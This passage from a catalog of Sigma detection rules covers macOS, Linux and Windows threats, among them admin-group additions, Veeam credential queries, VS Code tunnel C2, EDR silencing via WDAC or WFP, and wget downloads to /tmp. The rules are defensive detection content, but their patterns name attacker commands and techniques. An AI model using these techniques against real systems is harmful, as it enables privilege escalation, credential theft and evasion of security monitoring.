- attack.privilege-escalation
- attack.stealth
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection: # adds to admin group
Image|endswith: '/dscl'
CommandLine|contains|all:
- ' -append '
- ' /Groups/admin '
- ' GroupMembership '
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Moderate
High FP
User Added To Admin Group Via DseditGroup
Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
view Sigma YAML
title: User Added To Admin Group Via DseditGroup
id: 5d0fdb62-f225-42fb-8402-3dfe64da468a
status: test
description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos
- https://ss64.com/osx/dseditgroup.html
author: Sohan G (D4rkCiph3r)
date: 2023-08-22
tags:
- attack.persistence
- attack.initial-access
- attack.privilege-escalation
- attack.stealth
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/dseditgroup'
CommandLine|contains|all:
- ' -o edit ' # edit operation
- ' -a ' # username
- ' -t user'
- 'admin' # Group name
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Moderate
High FP
User Added To Admin Group Via Sysadminctl
Detects attempts to create and add an account to the admin group via "sysadminctl"
view Sigma YAML
title: User Added To Admin Group Via Sysadminctl
id: 652c098d-dc11-4ba6-8566-c20e89042f2b
related:
- id: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b
type: obsolete
status: test
description: Detects attempts to create and add an account to the admin group via "sysadminctl"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos
- https://ss64.com/osx/sysadminctl.html
author: Sohan G (D4rkCiph3r)
date: 2023-03-19
tags:
- attack.persistence
- attack.initial-access
- attack.privilege-escalation
- attack.stealth
- attack.t1078.003
logsource:
category: process_creation
product: macos
detection:
selection:
# Creates and adds new user to admin group
Image|endswith: '/sysadminctl'
CommandLine|contains|all:
- ' -addUser '
- ' -admin '
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
User Added To Root/Sudoers Group Using Usermod
Detects usage of the "usermod" binary to add users add users to the root or suoders groups
view Sigma YAML
title: User Added To Root/Sudoers Group Using Usermod
id: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73
status: test
description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
references:
- https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/
- https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/
author: TuanLe (GTSC)
date: 2022-12-21
tags:
- attack.privilege-escalation
- attack.persistence
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/usermod'
CommandLine|contains:
- '-aG root'
- '-aG sudoers'
condition: selection
falsepositives:
- Legitimate administrator activities
level: medium
Convert to SIEM query
medium
Moderate
High FP
User Added to Local Administrators Group
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
view Sigma YAML
title: User Added to Local Administrators Group
id: ad720b90-25ad-43ff-9b5e-5c841facc8e5
related:
- id: ffa28e60-bdb1-46e0-9f82-05f7a61cc06e # Remote Desktop groups
type: similar
- id: 10fb649c-3600-4d37-b1e6-56ea90bb7e09 # Privileged groups
type: similar
status: test
description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
references:
- https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-12
modified: 2023-03-02
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
category: process_creation
product: windows
detection:
selection_main:
- CommandLine|contains|all:
# net.exe
- 'localgroup '
- ' /add'
- CommandLine|contains|all:
# powershell.exe
- 'Add-LocalGroupMember '
- ' -Group '
selection_group:
CommandLine|contains:
- ' administrators '
- ' administrateur' # Typo without an 'S' so we catch both
condition: all of selection_*
falsepositives:
- Administrative activity
level: medium
Convert to SIEM query
medium
Moderate
High FP
User Has Been Deleted Via Userdel
Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
view Sigma YAML
title: User Has Been Deleted Via Userdel
id: 08f26069-6f80-474b-8d1f-d971c6fedea0
status: test
description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
references:
- https://linuxize.com/post/how-to-delete-group-in-linux/
- https://www.cyberciti.biz/faq/linux-remove-user-command/
- https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/
- https://linux.die.net/man/8/userdel
author: Tuan Le (NCSGroup)
date: 2022-12-26
tags:
- attack.impact
- attack.t1531
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/userdel'
condition: selection
falsepositives:
- Legitimate administrator activities
level: medium
Convert to SIEM query
medium
Moderate
High FP
UtilityFunctions.ps1 Proxy Dll
Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
view Sigma YAML
title: UtilityFunctions.ps1 Proxy Dll
id: 0403d67d-6227-4ea8-8145-4e72db7da120
status: test
description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
references:
- https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/
author: frack113
date: 2022-05-28
tags:
- attack.stealth
- attack.t1216
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- 'UtilityFunctions.ps1'
- 'RegSnapin '
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
VHD Image Download Via Browser
Detects creation of ".vhd"/".vhdx" files by browser processes.
Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
view Sigma YAML
title: VHD Image Download Via Browser
id: 8468111a-ef07-4654-903b-b863a80bbc95
status: test
description: |
Detects creation of ".vhd"/".vhdx" files by browser processes.
Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
references:
- https://redcanary.com/blog/intelligence-insights-october-2021/
- https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
date: 2021-10-25
modified: 2023-05-05
tags:
- attack.resource-development
- attack.t1587.001
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith:
- '\brave.exe'
- '\chrome.exe'
- '\firefox.exe'
- '\iexplore.exe'
- '\maxthon.exe'
- '\MicrosoftEdge.exe'
- '\msedge.exe'
- '\msedgewebview2.exe'
- '\opera.exe'
- '\safari.exe'
- '\seamonkey.exe'
- '\vivaldi.exe'
- '\whale.exe'
# We don't use "endswith" to also match with ADS logs and ".vhdx". Example: "TargetFilename: C:\Users\xxx\Downloads\windows.vhd:Zone.Identifier"
TargetFilename|contains: '.vhd'
condition: selection
falsepositives:
- Legitimate downloads of ".vhd" files would also trigger this
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Veeam Backup Database Suspicious Query
Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
view Sigma YAML
title: Veeam Backup Database Suspicious Query
id: 696bfb54-227e-4602-ac5b-30d9d2053312
status: test
description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
references:
- https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-04
tags:
- attack.collection
- attack.t1005
logsource:
category: process_creation
product: windows
detection:
selection_sql:
Image|endswith: '\sqlcmd.exe'
CommandLine|contains|all:
- 'VeeamBackup'
- 'From '
selection_db:
CommandLine|contains:
- 'BackupRepositories'
- 'Backups'
- 'Credentials'
- 'HostCreds'
- 'SmbFileShares'
- 'Ssh_creds'
- 'VSphereInfo'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Visual Studio Code Tunnel Remote File Creation
Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
view Sigma YAML
title: Visual Studio Code Tunnel Remote File Creation
id: 56e05d41-ce99-4ecd-912d-93f019ee0b71
status: test
description: |
Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
logsource:
category: file_event
product: windows
detection:
selection:
Image|contains: '\servers\Stable-'
Image|endswith: '\server\node.exe'
TargetFilename|contains: '\.vscode-server\data\User\History\'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Visual Studio Code Tunnel Service Installation
Detects the installation of VsCode tunnel (code-tunnel) as a service.
view Sigma YAML
title: Visual Studio Code Tunnel Service Installation
id: 30bf1789-379d-4fdc-900f-55cd0a90a801
status: test
description: Detects the installation of VsCode tunnel (code-tunnel) as a service.
references:
- https://ipfyx.fr/post/visual-studio-code-tunnel/
- https://badoption.eu/blog/2023/01/31/code_c2.html
- https://code.visualstudio.com/docs/remote/tunnels
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'tunnel '
- 'service'
- 'internal-run'
- 'tunnel-service.log'
condition: selection
falsepositives:
- Legitimate installation of code-tunnel as a service
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Visual Studio Code Tunnel Shell Execution
Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
view Sigma YAML
title: Visual Studio Code Tunnel Shell Execution
id: f4a623c2-4ef5-4c33-b811-0642f702c9f1
status: test
description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
references:
- https://ipfyx.fr/post/visual-studio-code-tunnel/
- https://badoption.eu/blog/2023/01/31/code_c2.html
- https://code.visualstudio.com/docs/remote/tunnels
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains: '\servers\Stable-'
ParentImage|endswith: '\server\node.exe'
ParentCommandLine|contains: '.vscode-server' # Technically one can host its own local server instead of using the VsCode one. And that would probably change the name (requires further research)
# Note: Child processes (ie: shells) can be whatever technically (with some efforts)
selection_child_1:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains: '\terminal\browser\media\shellIntegration.ps1'
selection_child_2:
Image|endswith:
- '\wsl.exe'
- '\bash.exe'
condition: selection_parent and 1 of selection_child_*
falsepositives:
- Legitimate use of Visual Studio Code tunnel and running code from there
level: medium
Convert to SIEM query
medium
Moderate
High FP
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
view Sigma YAML
title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution
id: a20391f8-76fb-437b-abc0-dba2df1952c6
related:
- id: 65c3ca2c-525f-4ced-968e-246a713d164f
type: similar
status: test
description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary
references:
- https://twitter.com/mrd0x/status/1463526834918854661
- https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-01-11
modified: 2023-04-11
tags:
- attack.execution
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\Microsoft.NodejsTools.PressAnyKey.exe'
condition: selection
falsepositives:
- Legitimate use by developers as part of NodeJS development with Visual Studio Tools
level: medium
Convert to SIEM query
medium
Moderate
High FP
VsCode Code Tunnel Execution File Indicator
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
view Sigma YAML
title: VsCode Code Tunnel Execution File Indicator
id: 9661ec9d-4439-4a7a-abed-d9be4ca43b6d
status: test
description: |
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
references:
- https://ipfyx.fr/post/visual-studio-code-tunnel/
- https://badoption.eu/blog/2023/01/31/code_c2.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-10-25
tags:
- attack.command-and-control
- detection.threat-hunting
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: '\code_tunnel.json'
condition: selection
falsepositives:
- Legitimate usage of VsCode tunneling functionality will also trigger this
level: medium
Convert to SIEM query
medium
Moderate
High FP
VsCode Powershell Profile Modification
Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
view Sigma YAML
title: VsCode Powershell Profile Modification
id: 3a9fa2ec-30bc-4ebd-b49e-7c9cff225502
related:
- id: b5b78988-486d-4a80-b991-930eff3ff8bf
type: similar
status: test
description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
references:
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-24
modified: 2023-01-06
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.013
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith: '\Microsoft.VSCode_profile.ps1'
condition: selection
falsepositives:
- Legitimate use of the profile by developers or administrators
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
WDAC Policy File Creation In CodeIntegrity Folder
Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
view Sigma YAML
title: WDAC Policy File Creation In CodeIntegrity Folder
id: 121b25f7-b9d6-4b37-afa0-cba317ec52f3
status: experimental
description: |
Attackers can craft a custom Windows Defender Application Control (WDAC) policy that blocks Endpoint Detection and Response (EDR) components while allowing their own malicious code. The policy is placed in the privileged Windows Code Integrity folder (C:\Windows\System32\CodeIntegrity\). Upon reboot, the policy prevents EDR drivers from loading, effectively bypassing security measures and may further enable undetected lateral movement within an Active Directory environment.
references:
- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
- https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97
author: Andreas Braathen (mnemonic.io)
date: 2025-01-30
tags:
- attack.defense-impairment
- attack.t1685
- detection.threat-hunting
logsource:
category: file_event
product: windows
definition: 'Requirements: By default the file_event log source might not contain the IntegrityLevel of the Process. It should be collected in order to use this rule'
detection:
selection:
TargetFilename|contains: ':\Windows\System32\CodeIntegrity\'
TargetFilename|endswith:
- '.cip'
- '.p7b'
IntegrityLevel: 'High'
condition: selection
falsepositives:
- May occur legitimately as part of admin activity, but rarely with interactive elevation.
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
WFP Filter Added via Registry
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
view Sigma YAML
title: WFP Filter Added via Registry
id: 1f1d8209-636e-4c6c-a137-781cca8b82f9
status: experimental
description: |
Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
references:
- https://github.com/netero1010/EDRSilencer/blob/0e73a7037ec65c52894d8208e6f605a7da0a34a6/EDRSilencer.c
- https://www.huntress.com/blog/silencing-the-edr-silencers
- https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html
author: Frack113
date: 2025-10-23
tags:
- attack.execution
- attack.defense-impairment
- attack.t1685
- attack.t1569.002
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\BFE\Parameters\Policy\Persistent\Filter\'
filter_main_svchost:
Image:
- 'C:\Windows\System32\svchost.exe'
- 'C:\Windows\SysWOW64\svchost.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
view Sigma YAML
title: WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load
id: b439f47d-ef52-4b29-9a2f-57d8a96cb6b8
status: test
description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
references:
- https://twitter.com/HunterPlaybook/status/1301207718355759107
- https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/
- https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-09-02
modified: 2023-02-22
tags:
- attack.lateral-movement
- attack.privilege-escalation
- attack.persistence
- attack.t1546.003
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\scrcons.exe'
ImageLoaded|endswith:
- '\vbscript.dll'
- '\wbemdisp.dll'
- '\wshom.ocx'
- '\scrrun.dll'
condition: selection
falsepositives:
- Legitimate event consumers
- Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
WMI Persistence - Script Event Consumer
Detects WMI script event consumers
view Sigma YAML
title: WMI Persistence - Script Event Consumer
id: ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e
status: test
description: Detects WMI script event consumers
references:
- https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
author: Thomas Patzke
date: 2018-03-07
modified: 2022-10-11
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1546.003
logsource:
category: process_creation
product: windows
detection:
selection:
Image: C:\WINDOWS\system32\wbem\scrcons.exe
ParentImage: C:\Windows\System32\svchost.exe
condition: selection
falsepositives:
- Legitimate event consumers
- Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button
level: medium
Convert to SIEM query
medium
Strong
Medium FP
WMIC Loading Scripting Libraries
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
view Sigma YAML
title: WMIC Loading Scripting Libraries
id: 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32
related:
- id: 8d63dadf-b91b-4187-87b6-34a1114577ea
type: similar
- id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d
type: similar
status: test
description: |
Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).
It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.
references:
- https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html
- https://twitter.com/dez_/status/986614411711442944
- https://lolbas-project.github.io/lolbas/Binaries/Wmic/
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-17
modified: 2022-10-13
tags:
- attack.stealth
- attack.t1220
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\wmic.exe'
ImageLoaded|endswith:
- '\jscript.dll'
- '\vbscript.dll'
condition: selection
falsepositives:
- The command wmic os get lastbootuptime loads vbscript.dll
- The command wmic os get locale loads vbscript.dll
- Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights
- The command `wmic ntevent` loads vbscript.dll
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
WSL Child Process Anomaly
Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
view Sigma YAML
title: WSL Child Process Anomaly
id: 2267fe65-0681-42ad-9a6d-46553d3f3480
related:
- id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule
type: derived
status: test
description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL
references:
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/
- https://twitter.com/nas_bench/status/1535431474429808642
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-23
modified: 2023-08-15
tags:
- attack.execution
- attack.stealth
- attack.t1218
- attack.t1202
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\wsl.exe'
- '\wslhost.exe'
selection_children_images:
Image|endswith:
# Add more suspicious/uncommon "lolbin" processes
- '\calc.exe'
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\wscript.exe'
selection_children_paths:
Image|contains:
- '\AppData\Local\Temp\'
- 'C:\Users\Public\'
- 'C:\Windows\Temp\'
- 'C:\Temp\'
- '\Downloads\'
- '\Desktop\'
condition: selection_parent and 1 of selection_children_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
Weak or Abused Passwords In CLI
Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
An example would be a threat actor creating a new user via the net command and providing the password inline
view Sigma YAML
title: Weak or Abused Passwords In CLI
id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4
status: test
description: |
Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
An example would be a threat actor creating a new user via the net command and providing the password inline
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/
- https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-14
modified: 2024-02-23
tags:
- attack.execution
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# Add more passwords
- '123456789'
- '123123qwE'
- 'Asd123.aaaa'
- 'Decryptme'
- 'P@ssw0rd!'
- 'Pass8080'
- 'password123' # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/
- 'test@202' # Covers multiple years
condition: selection
falsepositives:
- Legitimate usage of the passwords by users via commandline (should be discouraged)
- Other currently unknown false positives
level: medium
Convert to SIEM query
medium
Strong
Medium FP
WebDAV Temporary Local File Creation
Detects the creation of WebDAV temporary files with potentially suspicious extensions
view Sigma YAML
title: WebDAV Temporary Local File Creation
id: 4c55738d-72d8-490e-a2db-7969654e375f
related:
- id: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398
type: similar
status: test
description: Detects the creation of WebDAV temporary files with potentially suspicious extensions
references:
- https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
- https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
- https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4
author: Micah Babinski
date: 2023-08-21
tags:
- attack.initial-access
- attack.resource-development
- attack.t1584
- attack.t1566
- detection.threat-hunting
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains: '\AppData\Local\Temp\TfsStore\Tfs_DAV\'
TargetFilename|endswith:
- '.7z'
- '.bat'
- '.dat'
- '.ico'
- '.js'
- '.lnk'
- '.ps1'
- '.rar'
- '.vbe'
- '.vbs'
- '.zip'
condition: selection
falsepositives:
- Legitimate use of WebDAV in an environment
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
Detects the loading of dbgcore.dll or dbghelp.dll by WerFaultSecure.exe, which has been observed in EDR-Freeze attacks to suspend processes and evade detection.
However, this behavior has also been observed during normal software installations, so further investigation is required to confirm malicious activity.
When threat hunting, look for this activity in conjunction with other suspicious processes starting, network connections, or file modifications that occur shortly after the DLL load.
Pay special attention to timing - if other malicious activities occur during or immediately after this library loading, it may indicate EDR evasion attempts.
Also correlate with any EDR/AV process suspension events or gaps in security monitoring during the timeframe.
view Sigma YAML
title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b
related:
- id: 387df17d-3b04-448f-8669-9e7fd5e5fd8c
type: similar
- id: 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2
type: similar
status: experimental
description: |
Detects the loading of dbgcore.dll or dbghelp.dll by WerFaultSecure.exe, which has been observed in EDR-Freeze attacks to suspend processes and evade detection.
However, this behavior has also been observed during normal software installations, so further investigation is required to confirm malicious activity.
When threat hunting, look for this activity in conjunction with other suspicious processes starting, network connections, or file modifications that occur shortly after the DLL load.
Pay special attention to timing - if other malicious activities occur during or immediately after this library loading, it may indicate EDR evasion attempts.
Also correlate with any EDR/AV process suspension events or gaps in security monitoring during the timeframe.
references:
- https://github.com/TwoSevenOneT/EDR-Freeze
- https://blog.axelarator.net/hunting-for-edr-freeze/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-27
modified: 2026-01-09
tags:
- attack.defense-impairment
- attack.t1685
- detection.threat-hunting
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\WerFaultSecure.exe'
ImageLoaded|endswith:
- '\dbgcore.dll'
- '\dbghelp.dll'
condition: selection
falsepositives:
- Unknown
level: medium
regression_tests_path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml
Convert to SIEM query
medium
Strong
Medium FP
Wget Creating Files in Tmp Directory
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
view Sigma YAML
title: Wget Creating Files in Tmp Directory
id: 35a05c60-9012-49b6-a11f-6bab741c9f74
status: test
description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.command-and-control
- attack.t1105
logsource:
product: linux
category: file_event
detection:
selection:
Image|endswith: '/wget'
TargetFilename|startswith:
- '/tmp/'
- '/var/tmp/'
condition: selection
falsepositives:
- Legitimate downloads of files in the tmp folder.
level: medium
Convert to SIEM query
medium
Strong
Medium FP
WinSock2 Autorun Keys Modification
Detects modification of autostart extensibility point (ASEP) in registry.
view Sigma YAML
title: WinSock2 Autorun Keys Modification
id: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565
related:
- id: 17f878b8-9968-4578-b814-c4217fc5768c
type: derived
status: test
description: Detects modification of autostart extensibility point (ASEP) in registry.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
- https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
date: 2019-10-25
modified: 2023-08-17
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
logsource:
category: registry_set
product: windows
detection:
winsock_parameters_base:
TargetObject|contains: '\System\CurrentControlSet\Services\WinSock2\Parameters'
winsock_parameters:
TargetObject|contains:
- '\Protocol_Catalog9\Catalog_Entries'
- '\NameSpace_Catalog5\Catalog_Entries'
filter:
- Details: '(Empty)'
- Image: 'C:\Windows\System32\MsiExec.exe'
- Image: 'C:\Windows\syswow64\MsiExec.exe'
condition: winsock_parameters_base and winsock_parameters and not filter
falsepositives:
- Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
- Legitimate administrator sets up autorun keys for legitimate reason
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
WinSxS Executable File Creation By Non-System Process
Detects the creation of binaries in the WinSxS folder by non-system processes
view Sigma YAML
title: WinSxS Executable File Creation By Non-System Process
id: 34746e8c-5fb8-415a-b135-0abc167e912a
related:
- id: 64827580-e4c3-4c64-97eb-c72325d45399
type: derived
status: test
description: Detects the creation of binaries in the WinSxS folder by non-system processes
references:
- https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
